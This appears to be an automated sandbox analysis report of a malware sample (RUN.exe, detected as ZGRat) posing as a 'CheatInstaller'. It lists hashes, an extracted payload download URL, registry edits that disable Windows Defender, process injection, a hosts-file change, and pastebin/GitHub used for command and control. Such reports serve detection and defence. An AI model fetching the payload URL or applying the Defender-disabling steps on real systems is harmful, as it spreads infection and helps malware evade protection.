Resubmissions
Submitted  ID  Score
18-03-2024 19:24  240318-x4seaaha4x  10
18-03-2024 19:06  240318-xsb8xsfh83  10
18-03-2024 14:42  240318-r3a6qabc38  10

Analysis
max time kernel: 1620s
max time network: 1808s
platform: windows10-1703_x64
resource: win10-20240221-en
resource tags: arch:x64, arch:x86, image:win10-20240221-en, locale:en-us, os:windows10-1703-x64, system
submitted: 18-03-2024 19:24
Static task: static1
Behavioral task: behavioral1 (Sample: RUN.exe, Resource: win7-20240221-en)
Behavioral task: behavioral2 (Sample: RUN.exe, Resource: win10-20240221-en)
Behavioral task: behavioral3 (Sample: RUN.exe, Resource: win10v2004-20240226-en)
General
Target: RUN.exe
Size: 31.7MB
MD5: 41bf2693033eaed432dfa5c1d75cdeec
SHA1: ff038cb9e992a518106c80868176785e987c301d
SHA256: 148c3096bab88a675414bd9463c60c44317f3ee5d12f949526847827cb108010
SHA512: f8ffe83afac20f3fc2b0175542e0e98cc236d3ab6e6cdf7d3702b5b124af6b64e8edd2d6ddddda6bdf6a2288f8853c56fed3bcf490227a0867baeb2bf8cb80ff
SSDEEP: 786432:ELlFuTirkoTj4mAJidZgSekJEUlvgBNTTz+Ndz+t:fqjzddlekmg4LU+t
Malware Config
Extracted
https://raw.githubusercontent.com/washywashy14/7zip-bin/master/win/Uemlxaw.zip
Signatures
Detect ZGRat V1 34 IoCs
Processes:
resource  yara_rule
behavioral2/memory/2896-4335-0x0000014D5E3F0000-0x0000014D5EB2B000-memory.dmp  family_zgrat_v1
behavioral2/memory/2896-4337-0x0000014D5E3F0000-0x0000014D5EB2B000-memory.dmp  family_zgrat_v1
behavioral2/memory/2896-4343-0x0000014D5E3F0000-0x0000014D5EB2B000-memory.dmp  family_zgrat_v1
behavioral2/memory/3016-4348-0x00000000051E0000-0x0000000005450000-memory.dmp  family_zgrat_v1
behavioral2/memory/3044-4347-0x0000000004F80000-0x00000000051FF000-memory.dmp  family_zgrat_v1
behavioral2/memory/3016-4345-0x00000000051E0000-0x0000000005450000-memory.dmp  family_zgrat_v1
behavioral2/memory/3044-4349-0x0000000004F80000-0x00000000051FF000-memory.dmp  family_zgrat_v1
behavioral2/memory/2896-4351-0x0000014D5E3F0000-0x0000014D5EB2B000-memory.dmp  family_zgrat_v1
behavioral2/memory/3016-4354-0x00000000051E0000-0x0000000005450000-memory.dmp  family_zgrat_v1
behavioral2/memory/3044-4355-0x0000000004F80000-0x00000000051FF000-memory.dmp  family_zgrat_v1
behavioral2/memory/3044-4362-0x0000000004F80000-0x00000000051FF000-memory.dmp  family_zgrat_v1
behavioral2/memory/3016-4361-0x00000000051E0000-0x0000000005450000-memory.dmp  family_zgrat_v1
behavioral2/memory/3016-4368-0x00000000051E0000-0x0000000005450000-memory.dmp  family_zgrat_v1
behavioral2/memory/3044-4370-0x0000000004F80000-0x00000000051FF000-memory.dmp  family_zgrat_v1
behavioral2/memory/3044-4377-0x0000000004F80000-0x00000000051FF000-memory.dmp  family_zgrat_v1
behavioral2/memory/3016-4375-0x00000000051E0000-0x0000000005450000-memory.dmp  family_zgrat_v1
behavioral2/memory/2896-4364-0x0000014D5E3F0000-0x0000014D5EB2B000-memory.dmp  family_zgrat_v1
behavioral2/memory/3044-4383-0x0000000004F80000-0x00000000051FF000-memory.dmp  family_zgrat_v1
behavioral2/memory/3016-4382-0x00000000051E0000-0x0000000005450000-memory.dmp  family_zgrat_v1
behavioral2/memory/3044-4389-0x0000000004F80000-0x00000000051FF000-memory.dmp  family_zgrat_v1
behavioral2/memory/3016-4387-0x00000000051E0000-0x0000000005450000-memory.dmp  family_zgrat_v1
behavioral2/memory/3044-4395-0x0000000004F80000-0x00000000051FF000-memory.dmp  family_zgrat_v1
behavioral2/memory/3016-4394-0x00000000051E0000-0x0000000005450000-memory.dmp  family_zgrat_v1
behavioral2/memory/2896-4393-0x0000014D5E3F0000-0x0000014D5EB2B000-memory.dmp  family_zgrat_v1
behavioral2/memory/2896-4378-0x0000014D5E3F0000-0x0000014D5EB2B000-memory.dmp  family_zgrat_v1
behavioral2/memory/3016-4403-0x00000000051E0000-0x0000000005450000-memory.dmp  family_zgrat_v1
behavioral2/memory/3044-4402-0x0000000004F80000-0x00000000051FF000-memory.dmp  family_zgrat_v1
behavioral2/memory/2896-4405-0x0000014D5E3F0000-0x0000014D5EB2B000-memory.dmp  family_zgrat_v1
behavioral2/memory/3016-4409-0x00000000051E0000-0x0000000005450000-memory.dmp  family_zgrat_v1
behavioral2/memory/3044-4411-0x0000000004F80000-0x00000000051FF000-memory.dmp  family_zgrat_v1
behavioral2/memory/3044-4407-0x0000000004F80000-0x00000000051FF000-memory.dmp  family_zgrat_v1
behavioral2/memory/3044-4416-0x0000000004F80000-0x00000000051FF000-memory.dmp  family_zgrat_v1
behavioral2/memory/2896-4414-0x0000014D5E3F0000-0x0000014D5EB2B000-memory.dmp  family_zgrat_v1
behavioral2/memory/3016-4415-0x00000000051E0000-0x0000000005450000-memory.dmp  family_zgrat_v1
Processes:
description  ioc  process
Key created  \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection  reg.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"  reg.exe
Key created  \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection  reg.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"  reg.exe
Key created  \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection  reg.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"  reg.exe
Key deleted  \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection  reg.exe
Modifies security service 2 TTPs 1 IoCs
Processes:
description  ioc  process
Set value (int)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"  reg.exe
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
Processes:
description  pid  process  target process
PID 4208 created 3384  4208  EdUpdMachine.exe  Explorer.EXE
PID 4208 created 3384  4208  EdUpdMachine.exe  Explorer.EXE
PID 4208 created 3384  4208  EdUpdMachine.exe  Explorer.EXE
Drops file in Drivers directory 1 IoCs
Processes:
description  ioc  process
File created  C:\Windows\System32\drivers\etc\hosts  EdUpdMachine.exe
Stops running service(s) 3 TTPs
Executes dropped EXE 12 IoCs
Processes:
pid  process
4596  Install_YTTCHTs.exe
1308  MSID293.tmp
5004  winserverupd.exe
1368  MSI24F.tmp
4784  MSI251.tmp
3928  MSI250.tmp
2896  EdUpdMachine.exe
3044  Narsil.exe
3016  SurrogateServerIntoSvc.exe
4208  EdUpdMachine.exe
4356  Narsil.exe
2328  SurrogateServerIntoSvc.exe
Loads dropped DLL 25 IoCs
Processes:
pid  process  (entries, in the order recorded)
3640  MsiExec.exe  (4 entries)
2236  MsiExec.exe  (13 entries)
4764  MsiExec.exe  (6 entries)
2236  MsiExec.exe  (1 entry)
4764  MsiExec.exe  (1 entry)
Blocklisted process makes network request 2 IoCs
Processes:
flow  pid  process
6  4764  MsiExec.exe
8  4764  MsiExec.exe
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
description  ioc  process
File opened (read-only)  \??\I:  msiexec.exe
File opened (read-only)  \??\Y:  msiexec.exe
File opened (read-only)  \??\I:  Install_YTTCHTs.exe
File opened (read-only)  \??\V:  Install_YTTCHTs.exe
File opened (read-only)  \??\G:  msiexec.exe
File opened (read-only)  \??\Q:  Install_YTTCHTs.exe
File opened (read-only)  \??\S:  Install_YTTCHTs.exe
File opened (read-only)  \??\H:  msiexec.exe
File opened (read-only)  \??\J:  msiexec.exe
File opened (read-only)  \??\L:  msiexec.exe
File opened (read-only)  \??\K:  Install_YTTCHTs.exe
File opened (read-only)  \??\L:  Install_YTTCHTs.exe
File opened (read-only)  \??\M:  Install_YTTCHTs.exe
File opened (read-only)  \??\N:  msiexec.exe
File opened (read-only)  \??\M:  msiexec.exe
File opened (read-only)  \??\P:  msiexec.exe
File opened (read-only)  \??\R:  msiexec.exe
File opened (read-only)  \??\T:  msiexec.exe
File opened (read-only)  \??\U:  msiexec.exe
File opened (read-only)  \??\A:  Install_YTTCHTs.exe
File opened (read-only)  \??\T:  Install_YTTCHTs.exe
File opened (read-only)  \??\E:  msiexec.exe
File opened (read-only)  \??\X:  msiexec.exe
File opened (read-only)  \??\Z:  msiexec.exe
File opened (read-only)  \??\P:  Install_YTTCHTs.exe
File opened (read-only)  \??\W:  Install_YTTCHTs.exe
File opened (read-only)  \??\A:  msiexec.exe
File opened (read-only)  \??\K:  msiexec.exe
File opened (read-only)  \??\G:  Install_YTTCHTs.exe
File opened (read-only)  \??\J:  Install_YTTCHTs.exe
File opened (read-only)  \??\N:  Install_YTTCHTs.exe
File opened (read-only)  \??\Y:  Install_YTTCHTs.exe
File opened (read-only)  \??\O:  msiexec.exe
File opened (read-only)  \??\V:  msiexec.exe
File opened (read-only)  \??\B:  msiexec.exe
File opened (read-only)  \??\S:  msiexec.exe
File opened (read-only)  \??\W:  msiexec.exe
File opened (read-only)  \??\B:  Install_YTTCHTs.exe
File opened (read-only)  \??\O:  Install_YTTCHTs.exe
File opened (read-only)  \??\X:  Install_YTTCHTs.exe
File opened (read-only)  \??\U:  Install_YTTCHTs.exe
File opened (read-only)  \??\E:  Install_YTTCHTs.exe
File opened (read-only)  \??\H:  Install_YTTCHTs.exe
File opened (read-only)  \??\R:  Install_YTTCHTs.exe
File opened (read-only)  \??\Z:  Install_YTTCHTs.exe
File opened (read-only)  \??\Q:  msiexec.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
Processes:
flow  ioc
6  raw.githubusercontent.com
22  pastebin.com
23  pastebin.com
5  raw.githubusercontent.com
Drops file in System32 directory 6 IoCs
Processes:
description  ioc  process
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft  MsiExec.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache  MsiExec.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData  MsiExec.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04  MsiExec.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content  MsiExec.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04  MsiExec.exe
Suspicious use of SetThreadContext 4 IoCs
Processes:
description  pid  process  target process
PID 2896 set thread context of 4208  2896  EdUpdMachine.exe  EdUpdMachine.exe
PID 4208 set thread context of 4212  4208  EdUpdMachine.exe  svchost.exe
PID 3044 set thread context of 4356  3044  Narsil.exe  Narsil.exe
PID 3016 set thread context of 2328  3016  SurrogateServerIntoSvc.exe  SurrogateServerIntoSvc.exe
Drops file in Program Files directory 38 IoCs
Processes:
description  ioc  process
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_drums.wav  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_pp.wav  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\lang_ita.txt  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_birds.wav  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavenet_r9y9.wav  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_birds.wav  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_drums.wav  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_birds.wav  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_piano.wav  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\db.frm  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\event.csv  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_sc09.wav  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_parametric.wav  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_timit.wav  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_piano.wav  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_ps4.wav  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavenet_ibab.wav  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_drums.wav  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\slow_log.frm  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\help_relation.MYI  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_timit.wav  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\lang_fre.txt  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_tatum.wav  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_birds.wav  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_timit.wav  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_ps2.wav  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\general_log.frm  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\help_topic.frm  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_drums.wav  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_piano.wav  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_specgan.wav  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_timit.wav  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_piano.wav  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_sc09.wav  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\db.MYI  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_sc09.wav  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_samplernn.wav  msiexec.exe
File created  C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_sc09.wav  msiexec.exe
Drops file in Windows directory 33 IoCs
Processes:
description  ioc  process
File created  C:\Windows\Installer\e58466a.msi  msiexec.exe
File opened for modification  C:\Windows\Installer\MSI491A.tmp  msiexec.exe
File opened for modification  C:\Windows\Installer\MSI7F29.tmp  msiexec.exe
File opened for modification  C:\Windows\Installer\MSI250.tmp  msiexec.exe
File created  C:\Windows\Installer\e58466e.msi  msiexec.exe
File opened for modification  C:\Windows\Installer\MSI251.tmp  msiexec.exe
File opened for modification  C:\Windows\Installer\e58466a.msi  msiexec.exe
File opened for modification  C:\Windows\Installer\MSI8075.tmp  msiexec.exe
File opened for modification  C:\Windows\Installer\MSI8151.tmp  msiexec.exe
File opened for modification  C:\Windows\Installer\MSI8171.tmp  msiexec.exe
File opened for modification  C:\Windows\Installer\MSI8309.tmp  msiexec.exe
File opened for modification  C:\Windows\Installer\  msiexec.exe
File created  C:\Windows\Installer\inprogressinstallinfo.ipi  msiexec.exe
File opened for modification  C:\Windows\Installer\MSI7E7C.tmp  msiexec.exe
File opened for modification  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log  msiexec.exe
File opened for modification  C:\Windows\Installer\MSI7F78.tmp  msiexec.exe
File opened for modification  C:\Windows\Installer\MSID293.tmp  msiexec.exe
File opened for modification  C:\Windows\Installer\MSID2A3.tmp  msiexec.exe
File opened for modification  C:\Windows\Installer\MSI4BDC.tmp  msiexec.exe
File opened for modification  C:\Windows\Installer\MSI4CA8.tmp  msiexec.exe
File opened for modification  C:\Windows\Installer\MSI4D84.tmp  msiexec.exe
File opened for modification  C:\Windows\Installer\MSICC77.tmp  msiexec.exe
File opened for modification  C:\Windows\Installer\MSI24F.tmp  msiexec.exe
File opened for modification  C:\Windows\Installer\MSI64C8.tmp  msiexec.exe
File opened for modification  C:\Windows\Installer\MSI4B2F.tmp  msiexec.exe
File created  C:\Windows\Installer\SourceHash{AA26797C-3E2C-42C1-A832-A687DE957A1C}  msiexec.exe
File opened for modification  C:\Windows\Installer\MSI7FC7.tmp  msiexec.exe
File opened for modification  C:\Windows\Installer\MSI2DF.tmp  msiexec.exe
File opened for modification  C:\Windows\Installer\MSI4A53.tmp  msiexec.exe
File opened for modification  C:\Windows\Installer\MSI6330.tmp  msiexec.exe
File opened for modification  C:\Windows\Installer\MSI641B.tmp  msiexec.exe
File opened for modification  C:\Windows\Installer\MSI7E6B.tmp  msiexec.exe
File opened for modification  C:\Windows\Installer\MSI82E9.tmp  msiexec.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
pid  process
2528  sc.exe
4312  sc.exe
544  sc.exe
192  sc.exe
1092  sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Delays execution with timeout.exe 1 IoCs
Processes:
pid  process
1372  timeout.exe
Modifies data under HKEY_USERS 24 IoCs
Processes:
description  ioc  process
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"  MsiExec.exe
Key deleted  \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\1A\52C64B7E  msiexec.exe
Key deleted  \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a  msiexec.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1b  msiexec.exe
Key deleted  \REGISTRY\USER\.DEFAULT\Software\Caphyon  MsiExec.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer  MsiExec.exe
Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C}\C:\Users\Admin\AppData\Local\Temp\ferght6fj54f.txt = "*"  MsiExec.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"  MsiExec.exe
Key created  \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache  MsiExec.exe
Key deleted  \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer  MsiExec.exe
Key created  \REGISTRY\USER\.DEFAULT\Software  MsiExec.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\  MsiExec.exe
Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix  MsiExec.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing  MsiExec.exe
Set value (data)  \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000  MsiExec.exe
Key deleted  \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config  MsiExec.exe
Key deleted  \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C}  MsiExec.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C}  MsiExec.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Caphyon  MsiExec.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config  MsiExec.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"  MsiExec.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"  MsiExec.exe
Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"  MsiExec.exe
Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"  MsiExec.exe
Modifies registry class 26 IoCs
Processes:
description  ioc  process
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\PackageCode = "9860C08E1459A8B42A7F241C2213136F"  msiexec.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\OpenSource\\CheatInstaller 2.32\\install\\E957A1C\\"  msiexec.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\AuthorizedLUAApp = "0"  msiexec.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FA1A2714FC38171429580C777D5579A9  msiexec.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Net  msiexec.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C79762AAC2E31C248A236A78ED59A7C1  msiexec.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Language = "1033"  msiexec.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\InstanceType = "0"  msiexec.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\OpenSource\\CheatInstaller 2.32\\install\\E957A1C\\"  msiexec.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList  msiexec.exe
Key deleted  \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP  reg.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Assignment = "1"  msiexec.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FA1A2714FC38171429580C777D5579A9\C79762AAC2E31C248A236A78ED59A7C1  msiexec.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\PackageName = "YTtSTCHEAT.msi"  msiexec.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media  msiexec.exe
Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Clients = 3a0000000000  msiexec.exe
Key created  \REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings  SurrogateServerIntoSvc.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C79762AAC2E31C248A236A78ED59A7C1\MainFeature  msiexec.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\DeploymentFlags = "3"  msiexec.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media\DiskPrompt = "[1]"  msiexec.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media\1 = ";"  msiexec.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1  msiexec.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\ProductName = "CheatInstaller"  msiexec.exe
Key deleted  \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP  reg.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Version = "35651584"  msiexec.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\AdvertiseFlags = "388"  msiexec.exe
Runs ping.exe 1 TTPs 64 IoCs
Processes:
pid  process (all 64 entries are PING.EXE; pids in the order recorded)
3568, 4476, 3600, 5108, 4280, 556, 1152, 3940, 1652, 728, 5060, 4836, 212, 4476, 2328, 560,
1104, 404, 4776, 2360, 4996, 4712, 2340, 4652, 4476, 192, 4176, 1284, 196, 428, 2480, 2468,
3704, 3460, 2020, 2328, 5068, 5116, 3728, 992, 1344, 4952, 992, 3728, 4744, 1068, 4304, 3116,
1108, 2500, 4984, 3940, 4132, 4252, 4836, 4184, 4584, 4444, 4616, 2528, 3620, 2020, 2128, 2360
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid  process  (entries, in the order recorded)
1288  powershell.exe  (3 entries)
4292  msiexec.exe  (2 entries)
540  powershell.exe  (1 entry)
4332  powershell.exe  (1 entry)
540  powershell.exe  (3 entries)
4332  powershell.exe  (3 entries)
1752  powershell.exe  (4 entries)
32  powershell.exe  (4 entries)
1080  powershell.exe  (4 entries)
5096  powershell.exe  (4 entries)
3728  powershell.exe  (4 entries)
2868  powershell.exe  (3 entries)
232  powershell.exe  (3 entries)
4544  powershell.exe  (3 entries)
4468  powershell.exe  (3 entries)
4208  EdUpdMachine.exe  (2 entries)
4784  powershell.exe  (3 entries)
4208  EdUpdMachine.exe  (4 entries)
4212  svchost.exe  (10 entries)
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid  process
2328  SurrogateServerIntoSvc.exe
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid  process
664  (5 entries; no process name recorded)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
description  pid  process
Token: SeSecurityPrivilege  4292  msiexec.exe
Token: SeCreateTokenPrivilege  4596  Install_YTTCHTs.exe
Token: SeAssignPrimaryTokenPrivilege  4596  Install_YTTCHTs.exe
Token: SeLockMemoryPrivilege  4596  Install_YTTCHTs.exe
Token: SeIncreaseQuotaPrivilege  4596  Install_YTTCHTs.exe
Token: SeMachineAccountPrivilege  4596  Install_YTTCHTs.exe
Token: SeTcbPrivilege  4596  Install_YTTCHTs.exe
Token: SeSecurityPrivilege  4596  Install_YTTCHTs.exe
Token: SeTakeOwnershipPrivilege  4596  Install_YTTCHTs.exe
Token: SeLoadDriverPrivilege  4596  Install_YTTCHTs.exe
Token: SeSystemProfilePrivilege  4596  Install_YTTCHTs.exe
Token: SeSystemtimePrivilege  4596  Install_YTTCHTs.exe
Token: SeProfSingleProcessPrivilege  4596  Install_YTTCHTs.exe
Token: SeIncBasePriorityPrivilege  4596  Install_YTTCHTs.exe
Token: SeCreatePagefilePrivilege  4596  Install_YTTCHTs.exe
Token: SeCreatePermanentPrivilege  4596  Install_YTTCHTs.exe
Token: SeBackupPrivilege  4596  Install_YTTCHTs.exe
Token: SeRestorePrivilege  4596  Install_YTTCHTs.exe
Token: SeShutdownPrivilege  4596  Install_YTTCHTs.exe
Token: SeDebugPrivilege  4596  Install_YTTCHTs.exe
Token: SeAuditPrivilege  4596  Install_YTTCHTs.exe
Token: SeSystemEnvironmentPrivilege  4596  Install_YTTCHTs.exe
Token: SeChangeNotifyPrivilege  4596  Install_YTTCHTs.exe
Token: SeRemoteShutdownPrivilege  4596  Install_YTTCHTs.exe
Token: SeUndockPrivilege  4596  Install_YTTCHTs.exe
Token: SeSyncAgentPrivilege  4596  Install_YTTCHTs.exe
Token: SeEnableDelegationPrivilege  4596  Install_YTTCHTs.exe
Token: SeManageVolumePrivilege  4596  Install_YTTCHTs.exe
Token: SeImpersonatePrivilege  4596  Install_YTTCHTs.exe
Token: SeCreateGlobalPrivilege  4596  Install_YTTCHTs.exe
